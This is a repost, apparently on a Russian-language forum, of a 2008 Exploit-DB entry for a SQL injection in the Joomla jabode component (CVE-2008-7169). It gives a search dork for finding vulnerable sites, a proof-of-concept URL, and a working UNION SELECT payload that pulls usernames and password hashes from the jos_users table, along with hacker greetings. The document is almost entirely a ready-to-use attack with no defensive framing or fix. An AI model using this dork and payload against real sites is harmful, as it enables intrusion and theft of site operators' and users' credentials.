Exploit Joomla! Component jabode - 'id' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5963
Проверка EDB
  1. Пройдено
Автор
HIS0K4
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-7169
Дата публикации
2008-06-28
Код:
/---------------------------------------------------------------\
\                                				/
/       Joomla Component jabode Remote SQL injection            \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:com_jabode

[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--

[*] Funny note:  You can change "taurus" to your sign for best results xd...

                
----------------------------------------------------------------------------
[*] Greetings :  All friends & muslims HaCkeRs...
[*] Greetings2:  http://www.dz-secure.com
                 http://palcastle.org/cc

# milw0rm.com [2008-06-28]
 
Источник
www.exploit-db.com

Похожие темы